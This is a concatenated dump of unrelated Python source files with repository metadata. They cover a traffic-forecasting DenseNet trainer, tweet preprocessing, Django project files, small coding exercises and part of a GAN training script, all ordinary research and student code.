parse.add_argument('-no-train', dest='train', action='store_false')
parse.set_defaults(train=False)
parse.add_argument('-rows', nargs='+', type=int, default=[40, 60])
parse.add_argument('-cols', nargs='+', type=int, default=[40, 60])
parse.add_argument('-loss', type=str, default='l2', help='l1 | l2')
parse.add_argument('-lr', type=float, default=0.01)
parse.add_argument('-batch_size', type=int, default=32, help='batch size')
parse.add_argument('-epoch_size', type=int, default=500, help='epochs')
parse.add_argument('-test_row', type=int, default=10, help='test row')
parse.add_argument('-test_col', type=int, default=18, help='test col')
parse.add_argument('-save_dir', type=str, default='results')
opt = parse.parse_args()
print(opt)
opt.save_dir = '{}/{}'.format(opt.save_dir, opt.traffic)
def log(fname, s):
if not os.path.isdir(os.path.dirname(fname)):
os.system("mkdir -p " + os.path.dirname(fname))
f = open(fname, 'a')
f.write(str(datetime.now()) + ': ' + s + '\n')
f.close()
def train_epoch(data_type='train'):
total_loss = 0
if data_type == 'train':
model.train()
data = train_loader
if data_type == 'valid':
model.eval()
data = valid_loader
if (opt.close_size > 0) & (opt.meta == 1) & (opt.cross ==1):
for idx, (c, meta, cross, target) in enumerate(data):
optimizer.zero_grad()
model.zero_grad()
x = c.float().to(device)
meta = meta.float().to(device)
cross = cross.float().to(device)
target_var = target.float().to(device)
pred = model(x, meta=meta, cross=cross)
loss = criterion(pred, target_var)
total_loss += loss.item()
loss.backward()
optimizer.step()
elif (opt.close_size > 0) & (opt.meta == 1):
for idx, (x, meta, target) in enumerate(data):
optimizer.zero_grad()
model.zero_grad()
x = x.float().to(device)
meta = meta.float().to(device)
target_var = target.float().to(device)
pred = model(x, meta=meta)
loss = criterion(pred, target_var)
total_loss += loss.item()
loss.backward()
optimizer.step()
elif (opt.close_size > 0) & (opt.cross == 1):
for idx, (x, cross, target) in enumerate(data):
optimizer.zero_grad()
model.zero_grad()
x = x.float().to(device)
cross = cross.float().to(device)
target_var = target.float().to(device)
pred = model(x, cross=cross)
loss = criterion(pred, target_var)
total_loss += loss.item()
loss.backward()
optimizer.step()
elif opt.close_size > 0:
for idx, (c, target) in enumerate(data):
optimizer.zero_grad()
model.zero_grad()
x = c.float().to(device)
y = target.float().to(device)
pred = model(x)
loss = criterion(pred, y)
total_loss += loss.item()
loss.backward()
optimizer.step()
return total_loss
def train():
os.system("mkdir -p " + opt.save_dir)
best_valid_loss = 1.0
train_loss, valid_loss = [], []
for i in range(opt.epoch_size):
scheduler.step()
train_loss.append(train_epoch('train'))
valid_loss.append(train_epoch('valid'))
if valid_loss[-1] < best_valid_loss:
best_valid_loss = valid_loss[-1]
torch.save({'epoch': i, 'model': model, 'train_loss': train_loss,
'valid_loss': valid_loss}, opt.model_filename + '.model')
torch.save(optimizer, opt.model_filename + '.optim')
torch.save(model.state_dict(), opt.model_filename + '.pt')
log_string = ('iter: [{:d}/{:d}], train_loss: {:0.6f}, valid_loss: {:0.6f}, '
'best_valid_loss: {:0.6f}, lr: {:0.5f}').format((i + 1), opt.epoch_size,
train_loss[-1],
valid_loss[-1],
best_valid_loss,
opt.lr)
if i % 2 == 0:
print(log_string)
log(opt.model_filename + '.log', log_string)
def predict(test_type='train'):
predictions = []
ground_truth = []
loss = []
model.eval()
model.load_state_dict(torch.load(opt.model_filename + '.pt'))
# model.load_state_dict(torch.load('./results/call/base_200' + '.pt'))
if test_type == 'train':
data = train_loader
elif test_type == 'test':
data = test_loader
elif test_type == 'valid':
data = valid_loader
with torch.no_grad():
if (opt.close_size > 0) & (opt.meta == 1) & (opt.cross == 1):
for idx, (c, meta, cross, target) in enumerate(data):
optimizer.zero_grad()
model.zero_grad()
x = c.float().to(device)
meta = meta.float().to(device)
cross = cross.float().to(device)
# input_var = [_.float().to(device) for _ in [c, meta, cross]]
target_var = target.float().to(device)
pred = model(x, meta=meta, cross=cross)
predictions.append(pred.data.cpu())
ground_truth.append(target.data)
loss.append(criterion(pred, target_var).item())
elif (opt.close_size > 0) & (opt.meta == 1):
for idx, (x, meta, target) in enumerate(data):
optimizer.zero_grad()
model.zero_grad()
# input_var = [_.float() for _ in [c, meta]]
x = x.float().to(device)
meta = meta.float().to(device)
y = target.float().to(device)
pred = model(x, meta=meta)
predictions.append(pred.data.cpu())
ground_truth.append(target.data)
loss.append(criterion(pred, y).item())
elif (opt.close_size > 0) & (opt.cross == 1):
for idx, (x, cross, target) in enumerate(data):
optimizer.zero_grad()
model.zero_grad()
# input_var = [_.float() for _ in [c, meta]]
x = x.float().to(device)
cross = cross.float().to(device)
y = target.float().to(device)
pred = model(x, cross=cross)
predictions.append(pred.data.cpu())
ground_truth.append(target.data)
loss.append(criterion(pred, y).item())
elif opt.close_size > 0:
for idx, (c, target) in enumerate(data):
optimizer.zero_grad()
model.zero_grad()
x = c.float().to(device)
y = target.float().to(device)
pred = model(x)
predictions.append(pred.data.cpu())
ground_truth.append(target.data)
loss.append(criterion(pred, y).item())
final_predict = np.concatenate(predictions)
ground_truth = np.concatenate(ground_truth)
print(final_predict.shape, ground_truth.shape)
ground_truth = mmn.inverse_transform(ground_truth)
final_predict = mmn.inverse_transform(final_predict)
return final_predict, ground_truth
def train_valid_split(dataloader, test_size=0.2, shuffle=True, random_seed=0):
length = len(dataloader)
indices = list(range(0, length))
if shuffle:
np.random.seed(random_seed)
np.random.shuffle(indices)
if type(test_size) is float:
split = int(np.floor(test_size * length))
elif type(test_size) is int:
split = test_size
else:
raise ValueError('%s should be an int or float'.format(str))
return indices[split:], indices[:split]
if __name__ == '__main__':
path = '/home/dl/ct/data/all_data_ct.h5'
feature_path = '/home/dl/ct/data/crawled_feature.csv'
X, X_meta, X_cross, y, label, mmn = read_data(path, feature_path, opt)
# labels_df = pd.DataFrame(label + 1, columns=['cluster_label'])
# labels_df.to_csv('cluster_label_20.csv', index=False, header=0)
if opt.cluster > 1:
labels_df = pd.read_csv('cluster_label_20.csv', header=None)
labels_df.columns = ['cluster_label']
else:
labels_df = pd.DataFrame(np.ones(shape=(len(label),)), columns=['cluster_label'])
samples, sequences, channels, height, width = X.shape
x_train, x_test = X[:-opt.test_size], X[-opt.test_size:]
meta_train, meta_test = X_meta[:-opt.test_size], X_meta[-opt.test_size:]
cross_train, cross_test = X_cross[:-opt.test_size], X_cross[-opt.test_size:]
y_tr = y[:-opt.test_size]
y_te = y[-opt.test_size:]
prediction_ct = 0
truth_ct = 0
for cluster_id in (set(labels_df['cluster_label'].values)):
print('Cluster: %d' % cluster_id)
opt.model_filename = '{}/model={}lr={}-close={}-period=' \
'{}-meta={}-cross={}-crop={}-cluster={}'.format(opt.save_dir,
'densenet',
opt.lr,
opt.close_size,
opt.period_size,
opt.meta,
opt.cross, opt.crop, cluster_id)
print('Saving to ' + opt.model_filename)
labels_df['cur_label'] = 0
labels_df['cur_label'][labels_df['cluster_label'] == int(cluster_id)] = 1
cell_idx = labels_df['cur_label'] == 1
cell_idx = np.reshape(cell_idx, (height, width))
y_train = y_tr * cell_idx
y_test = y_te * cell_idx
if (opt.meta == 1) & (opt.cross == 1):
train_data = list(zip(*[x_train, meta_train, cross_train, y_train]))
test_data = list(zip(*[x_test, meta_test, cross_test, y_test]))
elif (opt.meta == 1) & (opt.cross == 0):
train_data = list(zip(*[x_train, meta_train, y_train]))
test_data = list(zip(*[x_test, meta_test, y_test]))
elif (opt.cross == 1) & (opt.meta == 0):
train_data = list(zip(*[x_train, cross_train, y_train]))
test_data = list(zip(*[x_test, cross_test, y_test]))
elif (opt.meta == 0) & (opt.cross == 0):
train_data = list(zip(*[x_train, y_train]))
test_data = list(zip(*[x_test, y_test]))
print(len(train_data), len(test_data))
# split the training data into train and validation
train_idx, valid_idx = train_valid_split(train_data, 0.1)
train_sampler = SubsetRandomSampler(train_idx)
valid_sampler = SubsetRandomSampler(valid_idx)
train_loader = DataLoader(train_data, batch_size=opt.batch_size, sampler=train_sampler,
num_workers=8, pin_memory=True)
valid_loader = DataLoader(train_data, batch_size=opt.batch_size, sampler=valid_sampler,
num_workers=2, pin_memory=True)
test_loader = DataLoader(test_data, batch_size=opt.batch_size, shuffle=False)
input_shape = X.shape
meta_shape = X_meta.shape
cross_shape = X_cross.shape
model = DenseNet(input_shape, meta_shape,
cross_shape, nb_flows=opt.nb_flow,
fusion=opt.fusion, maps=(opt.meta+opt.cross+1)).to(device)
if opt.train:
if cluster_id > 1:
model_name = '{}/model={}lr={}-close={}-period=' \
'{}-meta={}-cross={}-crop={}-cluster={}'.format(opt.save_dir,
'densenet',
opt.lr,
opt.close_size,
opt.period_size,
opt.meta,
opt.cross, opt.crop, cluster_id - 1)
model.load_state_dict(torch.load(model_name + '.pt'))
if opt.transfer == 1:
if opt.traffic == 'sms':
model.load_state_dict(torch.load('./results/call/call_base2.pt'))
elif opt.traffic == 'call':
model.load_state_dict(torch.load('./results/sms/sms_base2.pt'))
optimizer = optim.Adam(model.parameters(), opt.lr)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,
milestones=[0.5 * opt.epoch_size,
0.75 * opt.epoch_size],
gamma=0.1)
if not os.path.exists(opt.save_dir):
os.makedirs(opt.save_dir)
if not os.path.isdir(opt.save_dir):
raise Exception('%s is not a dir' % opt.save_dir)
if opt.loss == 'l1':
criterion = nn.L1Loss().cuda()
elif opt.loss == 'l2':
criterion = nn.MSELoss().cuda()
print('Training...')
log(opt.model_filename + '.log', '[training]')
if opt.train:
train()
pred, truth = predict('test')
prediction_ct += pred * cell_idx
truth_ct += truth * cell_idx
# 2018-04-20 in_error and out_error
if opt.traffic != 'internet':
prediction_ct[-24] = (((truth_ct[-25] + truth_ct[-26] + truth_ct[-27]) / 3)* 2.5)
# prediction_ct[-24] = truth_ct[-25] * 2
# plt.plot(prediction_ct[:, 0, opt.test_row, opt.test_col], 'r-', label='prediction')
# plt.plot(truth_ct[:, 0, opt.test_row, opt.test_col], 'k-', label='truth')
# plt.legend()
# plt.show()
if opt.nb_flow > 1:
print(
'Final RMSE:{:0.5f}'.format(
metrics.mean_squared_error(prediction_ct.ravel(), truth_ct.ravel()) ** 0.5))
pred_in, pred_out = prediction_ct[:, 0], prediction_ct[:, 1]
truth_in, truth_out = truth_ct[:, 0], truth_ct[:, 1]
print('In traffic RMSE:{:0.5f}'.format(
metrics.mean_squared_error(pred_in.ravel(), truth_in.ravel()) ** 0.5))
print('Out traffic RMSE:{:0.5f}'.format(
metrics.mean_squared_error(pred_out.ravel(), truth_out.ravel()) ** 0.5))
else:
print('Final RMSE:{:0.5f}'.format(
metrics.mean_squared_error(prediction_ct.ravel(), truth_ct.ravel()) ** 0.5)) | [
"noreply@github.com"
] | JessicaAndcode.noreply@github.com |
e05fbbc428978050d937f54e0af1fce076af5ff7 | 93f0b1e11f73fcf6146503dc65e9056bf2a9cb12 | /dataset2/clean_data2.py | 8308be276c768bcdd46d43948acfdae0b3d94c98 | [] | no_license | alcina-sharon/Twitter-Sentiment-Analysis | e283a076ad21ed9075b8786e286dc1cfca5d8689 | d9aa15a14bbc6573af81b0acaed612e151760b49 | refs/heads/master | 2020-04-17T13:53:08.552245 | 2019-01-20T07:43:36 | 2019-01-20T07:43:36 | 166,634,243 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,026 | py | import pandas as pd
import numpy as np
import nltk
import re
from nltk.corpus import stopwords
from nltk.corpus import wordnet
import wordninja
from autocorrect import spell
"""spelling mistake
abbreviate shortforms"""
en_stops = set(stopwords.words('english'))
data_train = pd.read_csv("hatespeech.csv")
#print (data_train.shape)
data_test = pd.read_csv("train_tweets2.csv")
#print (data_test.shape)
data = data_train.append(data_test, ignore_index=True)
#print (data.shape)
#abb = set()
abb = list()
#removes @user
def remove(pattern,tweet):
txt = re.findall(pattern,tweet)
for i in txt:
tweet = re.sub(i,'',tweet)
return tweet
#"#MeToo" is separated into Me Too
def separate(tweet):
txt = re.findall("#[\w]*",tweet)
for i in txt:
if any(x.isupper() for x in i):#true if capital letter is present
tweet = re.sub(i," ".join(re.findall("[A-Z][^A-Z]*",i)),tweet)
tweet = tweet.replace("#", "")
return tweet
#removes stop words like "in ,is ,the , a ,an...."
def stopwords(tweet):
sentence = ''
all_words = tweet.split()
for word in all_words:
if word not in en_stops:
sentence = sentence+" "+word
return (sentence)
def check(tweet):
tweet_tokenized = tweet.split()
for i in tweet_tokenized:
if not wordnet.synsets(i):
word_to_be_replaced = ""
split_word_i = wordninja.split(i)
for k in split_word_i:
word_to_be_replaced = word_to_be_replaced+ " " + k
#print (word_to_be_replaced)
#print (i," should be replaced with ",word_to_be_replaced)
tweet = tweet.replace(i,word_to_be_replaced)
tweet_tokenized = tweet.split()
tweet = ""
for i in tweet_tokenized:
if i is "":
tweet_tokenized.remove("")
for i in tweet_tokenized:
tweet = tweet + i + " "
return tweet
def spell_check(tweet):
tweet_tokenized = tweet.split()
for i in tweet_tokenized:
if not wordnet.synsets(i):
w = spell(i)
print (i," to be replaced with",w)
tweet = tweet.replace("i","w")
return tweet
data['clean_tweet'] = np.vectorize(remove)( "@[\w]*",data['tweet'])
#^[a-zA-Z] means any a-z or A-Z at the start of a line
#[^a-zA-Z] means any character that IS NOT a-z OR A-Z
#deleting anything that does not start with 'a-z' or 'A-Z' or '#'
data['clean_tweet'] = data['clean_tweet'].str.replace("[^a-zA-Z#]", " ")
data['clean_tweet'] = np.vectorize(separate)(data['clean_tweet'])
#data['clean_tweet'] = np.vectorize(stopwords)(data['clean_tweet'])
data['clean_tweet'] = np.vectorize(check)(data['clean_tweet'])
#data['clean_tweet'] = np.vectorize(spell_check)(data['clean_tweet'])
print (len(abb))
'''for i in b:
b.remove("")
'''
data.drop("tweet", inplace=True, axis=1)
data.to_csv("cleaned_data.csv")
print (data.head(10))
"""31123 is for set and 77084 is for list"""
data = pd.read_csv("cleaned_data.csv")
print (data.head(10))
| [
"alcinasharon@gmail.com"
] | alcinasharon@gmail.com |
6c82c194195c99378956636d2ad0b6ad91c129e4 | 32a19c577823baa93e65547814187e8b0dd35941 | /common/noise.py | 8b55012405a45d096d717cb72c36eb8ded955129 | [
"MIT"
] | permissive | wedddy0707/noisyEGG | 77390bc69da8a36bb7ef1a165ec7b018a9806fb2 | 7032d1dae6f2c155f462f54fad541fcf44bf0b5b | refs/heads/main | 2023-05-01T07:12:27.925658 | 2021-05-27T04:18:33 | 2021-05-27T04:18:33 | 332,448,731 | 2 | 0 | MIT | 2021-01-28T02:13:43 | 2021-01-24T12:51:49 | Python | UTF-8 | Python | false | false | 936 | py | # Copyright (c) 2021 Ryo Ueda
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch
import torch.nn as nn
class GaussNoise(nn.Module):
def __init__(self, loc, scale):
super(GaussNoise, self).__init__()
self.loc = loc if loc is not None else 0.0
self.scale = scale if scale is not None else 0.0
def forward(self, x):
return x + float(self.training) * (
self.loc + self.scale * torch.randn_like(x).to(x.device)
)
class Noise(nn.Module):
def __init__(
self,
loc=None,
scale=None,
dropout_p=None,
):
super(Noise, self).__init__()
if dropout_p is not None:
self.layer = nn.Dropout(p=dropout_p)
else:
self.layer = GaussNoise(loc=loc, scale=scale)
def forward(self, x):
return self.layer(x)
| [
"ryoryo.ueda@gmail.com"
] | ryoryo.ueda@gmail.com |
77473162ea64a2f5ceb805b1b8e2140bb3078d15 | 0684b94ee5adf6a268115ab7f0a106a053f40503 | /database1/data2/migrations/0001_initial.py | 185cc0796cc2cf1b2b816969f7f807cc9fde6c3a | [] | no_license | shiny-saro/django-ex | 78a6240b3db2cbcd65e04ff9bee6a8a883dad434 | 9cdd88f9459a5184b8ea20b5c132b71a8898d78b | refs/heads/master | 2021-01-01T03:49:05.149565 | 2016-05-04T07:06:38 | 2016-05-04T07:06:38 | 57,967,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-04-22 09:57
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Faculty',
fields=[
('fid', models.CharField(max_length=9, primary_key=True, serialize=False)),
('fname', models.CharField(blank=True, max_length=40, null=True)),
],
options={
'db_table': 'faculty',
'managed': False,
},
),
]
| [
"shinysaro@gmail.com"
] | shinysaro@gmail.com |
efe8e8ebb067601b81a18bc1cf96e4a34bcf3d39 | 99d5b87018e11979dd417fcf40686f92e7ee33ef | /sample/django_wiki/mysite/wiki/models.py | 3319a30c2e9cdf001ee86786babf932f5a111444 | [
"MIT"
] | permissive | william-os4y/fapws2 | 123a0b8cbb8cbe343ee6ab7a8a33f7b5ad664238 | 5752af742b763517ce0a52d0f0c00b40b186edf8 | refs/heads/master | 2020-05-31T08:20:53.247648 | 2008-12-23T13:18:00 | 2008-12-26T14:29:35 | 70,378 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | from django.db import models
from django.conf import settings
class Wikipage(models.Model):
"""Wiki page storage"""
title = models.CharField(maxlength=30)
content = models.TextField()
def editurl(self):
return settings.WIKI_SITEBASE + "edit/" + self.title + "/"
def __repr__(self):
return self.title
class Admin:
list_display=('title',)
| [
"william@opensource4you.com"
] | william@opensource4you.com |
b0fc3c4330eac60491cf98e16081e9edd647a33f | 1d38a0799f8df3639df9e2f295700458abdc1dd4 | /PYTHON/Iniciante/uri-1044-multiplos.py | d037b111ebdd742cd8a992457f25fbc488a8e509 | [] | no_license | wellysonmartins/algoritmos-uri-online-judge | 76df1791b6c8ac7512aa7d2de3a885c5673c9580 | 9f826d797948cb75ec78a2bdc7e91532957620a1 | refs/heads/master | 2020-05-01T07:29:33.155118 | 2019-05-08T14:55:38 | 2019-05-08T14:55:38 | 177,353,047 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 132 | py | a, b = map(int, input().split(" "))
if (a%b == 0) or (b%a == 0):
print("Sao Multiplos")
else:
print("Nao sao Multiplos") | [
"wellysonmartins@gmail.com"
] | wellysonmartins@gmail.com |
e3746b822298e3a57d89211a8ed2ce97b16c4ede | b83caaee74dcc633b116cbb080775a2c0f693ddf | /lib/utils/blob.py | 7369dba319ed4084c24a8ddca9e4618df3742f29 | [
"MIT"
] | permissive | Duxiaowey/PsDetection | 30efde5777b9f0ee3920bf6a0cdd2f9811c88f57 | c16204d95f48a83600f7029fcafae531d1aec1d1 | refs/heads/master | 2020-08-09T17:23:46.199666 | 2019-11-19T02:37:36 | 2019-11-19T02:37:36 | 214,132,496 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,931 | py | # --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Blob helper functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import numpy as np
# 将图片转换为适合网络输入的形式
def im_list_to_blob(ims):
"""Convert a list of images into a network input.
Assumes images are already prepared (means subtracted, BGR order, ...).
"""
max_shape = np.array([im.shape for im in ims]).max(axis=0)
num_images = len(ims)
blob = np.zeros((num_images, max_shape[0], max_shape[1], 3),
dtype=np.float32)
for i in range(num_images):
im = ims[i]
blob[i, 0:im.shape[0], 0:im.shape[1], :] = im
return blob
# 将图片减掉均值后resize为统一尺寸
def prep_im_for_blob(im, pixel_means, target_size, max_size):
"""
Mean subtract and scale an image for use in a blob.
Returns
-------
im: ndarray
im = im - mean
im_scale: float
target_size/im_size_min 或 max_size/im_size_max
"""
im = im.astype(np.float32, copy=False)
im -= pixel_means
im_shape = im.shape
im_size_min = np.min(im_shape[0:2]) # 图片维度的最大值, 如shape=[3,6,2], 则im_size_min=2
im_size_max = np.max(im_shape[0:2]) # 图片维度的最小值, 如shape=[3,6,2], 则im_size_min=6
im_scale = float(target_size) / float(im_size_min)
# Prevent the biggest axis from being more than MAX_SIZE
if np.round(im_scale * im_size_max) > max_size:
im_scale = float(max_size) / float(im_size_max)
im = cv2.resize(im, None, None, fx=im_scale, fy=im_scale,
interpolation=cv2.INTER_LINEAR)
return im, im_scale
| [
"519780052@qq.com"
] | 519780052@qq.com |
3b3687c87b7098d9ee73292c4d73c5153c10e292 | ba00b7afbb46c3f701a4d812523ae56721ae1db2 | /drf_intro/settings.py | 4edace574e91b17cf199e3add50d43fef9d4e68c | [] | no_license | al-zero/simple-restful-apis | b29e4407550b89f3b0f9895588e3e421e5bdc136 | b80c94fd940990e22e49206fd7e23556c48cff1c | refs/heads/master | 2023-06-22T11:43:11.356389 | 2021-07-25T22:33:50 | 2021-07-25T22:33:50 | 375,231,751 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,683 | py | """
Django settings for drf_intro project.
Generated by 'django-admin startproject' using Django 3.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
#BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'nxe3n&5*xbwrd1hl13!xpc#unbyx_i=*)nmk8x&-eu(z==gn!p'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'api.apps.ApiConfig',
'api_product.apps.ApiProductConfig',
'api_test.apps.ApiTestConfig',
'api_file_upload.apps.ApiFileUploadConfig',
'api_ecommerce.apps.ApiEcommerceConfig',
'api_notes.apps.ApiNotesConfig',
'api_profile.apps.ApiProfileConfig',
#'api_user_auth.apps.ApiUserAuthConfig',
]
# AUTH_USER_MODEL = "user.CustomUser"
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'drf_intro.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'drf_intro.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'drf_intro_apis',
'USER': 'postgres',
'PASSWORD': 'password',
'HOST': 'localhost',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = BASE_DIR + MEDIA_URL
| [
"alphasabawu@gmail.com"
] | alphasabawu@gmail.com |
8cfd790559507720fd1bde192d62cf97c8614046 | 0825ec3de05d9593f3c16a89b7c3434e91680252 | /dataLoad.py | b59d8b72464ac4bb0b724235ebfa365a643f1464 | [] | no_license | dangk89/thesis-project | 9dcd91a43a2a690acbe835749a705770762f62a4 | 97951aca4989d9950a2ad6b962ef8ee410589150 | refs/heads/master | 2020-04-23T14:51:43.019565 | 2019-07-11T08:34:34 | 2019-07-11T08:34:34 | 171,246,433 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 862 | py | import json
import os
import pprint
def commentCounter():
count = 0
trump_c = 0
hil_c = 0
ted_c = 0
bern_c = 0
for file in os.listdir('data/'):
with open('data/'+file) as f:
data = json.load(f)
if file[:2] == 'cl':
hil_c += len(data)
elif file[:2] == 'cr':
ted_c += len(data)
elif file[:2] == 'tr':
trump_c += len(data)
elif file[:2] == 'sa':
bern_c += len(data)
count += len(data)
#print(file+'\n'+str(len(data))+'\n')
print('trump: '+str(trump_c))
print('hillary:'+str(hil_c))
print('cruz: '+str(ted_c))
print('bernie: '+str(bern_c))
print('total comments: '+str(count))
#commentCounter()
def submissionCounter():
with open('articles.json') as f:
data = json.load(f)
pretty_dict_str = pprint.pformat(data[0][0])
pprint.pprint(pretty_dict_str)
submissionCounter(
) | [
"dgk89@hotmail.dk"
] | dgk89@hotmail.dk |
23d317072883fe6153f73e21cce080af5f1a7fda | 4f4ac8bb1a3db70bf6582f0320ba4993d23efb99 | /lab-5/solutions/traveler.py | 4b8cf8e35744934f741c55510917b0b9ec199b9a | [] | no_license | letsbrewcode/python-coding-lab | 479f3e5ee76bd33803bb1778347105efc6d19645 | eb90e1ac5f1560fd6170a120ac983e6900bbb183 | refs/heads/master | 2021-05-18T06:31:27.511832 | 2020-09-28T03:16:55 | 2020-09-28T03:16:55 | 251,159,756 | 0 | 1 | null | 2020-06-09T22:38:32 | 2020-03-29T23:58:58 | Python | UTF-8 | Python | false | false | 1,560 | py | # Find end destination of travel route
# Imagine a 2D coordinate system centered at (0,0), You are given the
# route of a traveling point in the form of array. Each item of the array
# contains a direction and distace moved in that direction. Complete the
# function, destination to compute the route and return the final coordinate
# where the point finishes its travel. The answer should be returned in
# the form of a tuple, (x, y)
# Example
# Input = [['N', 1], ['E', 1]]
# Output = (1, 1)
# The point moves 1 unit north and then 1 unit east resulting in the final
# destination as x = 1 and y = 1. It is returned as tuple, (1, 1)
def destination(route):
x, y = 0, 0
for direction, distance in route:
if direction == 'E':
x += distance
continue
if direction == 'W':
x -= distance
continue
if direction == 'N':
y += distance
continue
if direction == 'S':
y -= distance
continue
return x, y
def test(got, expected):
if got == expected:
prefix = ' OK '
else:
prefix = ' X '
print('{} got: {} expected: {}'.format(prefix, repr(got), repr(expected)))
if __name__ == '__main__':
route1 = [['E', 2], ['N', 5], ['W', 1]]
route2 = [['E', 4], ['N', 10], ['W', 7], ['S', 7], ['E', 10]]
route3 = [['E', 10], ['N', 10], ['W', 10], ['S', 5], ['S', 5]]
test(destination(route1), (1, 5))
test(destination(route2), (7, 3))
test(destination(route3), (0, 0))
| [
"noreply@github.com"
] | letsbrewcode.noreply@github.com |
cd529db81056cddb2b28783f58bc70f955089bd0 | 4e9ea48452c1a07ae50fadb2c3b4453ef63eb603 | /runs/run23/train.py | 45b42aaf1cffa2ddfa529a2516492385f6be9a15 | [] | no_license | ShinyCode/gan-stronomy | a2b4f087134cc1f4ae187100959793b543f8d751 | 8b100d8416714795374d8788f517fc02e591c66a | refs/heads/master | 2020-04-02T16:08:09.138022 | 2018-12-20T01:50:12 | 2018-12-20T01:50:12 | 154,599,736 | 9 | 2 | null | null | null | null | UTF-8 | Python | false | false | 6,730 | py | # Based loosely off https://github.com/eriklindernoren/PyTorch-GAN/blob/master/implementations/cgan/cgan.py
import util
import torch
from torch.autograd import Variable
import torch.optim
import torch.nn
import torch.utils.data
from dataset import GANstronomyDataset
import os
from model import Generator, Discriminator
from PIL import Image
import numpy as np
import opts
from opts import FloatTensor, LongTensor
import shutil
BCELoss = torch.nn.BCELoss()
MSELoss = torch.nn.MSELoss()
def get_img_gen(data, split_index, G, iepoch, out_path):
old_split_index = data.split_index
data.set_split_index(split_index)
data_loader = torch.utils.data.DataLoader(data, batch_size=1, shuffle=False)
data_batch = next(iter(data_loader))
with torch.no_grad():
recipe_ids, recipe_embs, img_ids, imgs, classes = data_batch
batch_size, recipe_embs, imgs, classes, classes_one_hot = util.get_variables(recipe_ids, recipe_embs, img_ids, imgs, classes, data.num_classes())
imgs_gen = G(recipe_embs, classes_one_hot)
save_img(imgs_gen[0], iepoch, out_path, split_index, recipe_ids[0], img_ids[0])
data.set_split_index(old_split_index)
# img_gen is [3, 64, 64]
def save_img(img_gen, iepoch, out_path, split_index, recipe_id, img_id):
filename = '_'.join([opts.TVT_SPLIT_LABELS[split_index], str(iepoch), recipe_id, img_id]) + '.png'
util.save_img(img_gen, out_path, filename)
def print_loss(G_loss, D_loss, iepoch):
print("[%s] Epoch: %d\tG_Loss: %f\tD_Loss: %f" % (util.get_time(), iepoch, G_loss, D_loss))
def save_model(G, G_optimizer, D, D_optimizer, iepoch, out_path):
filename = '_'.join(['model', 'run%d' % opts.RUN_ID, opts.DATASET_NAME, str(iepoch)]) + '.pt'
out_path = os.path.abspath(out_path)
torch.save({
'iepoch': iepoch,
'G_state_dict': G.state_dict(),
'G_optimizer_state_dict': G_optimizer.state_dict(),
'D_state_dict': D.state_dict(),
'D_optimizer_state_dict': D_optimizer.state_dict()
}, os.path.join(out_path, filename))
def load_state_dicts(model_path, G, G_optimizer, D, D_optimizer):
model_path = os.path.abspath(model_path)
saved_model = torch.load(model_path)
G.load_state_dict(saved_model['G_state_dict'])
G_optimizer.load_state_dict(saved_model['G_optimizer_state_dict'])
D.load_state_dict(saved_model['D_state_dict'])
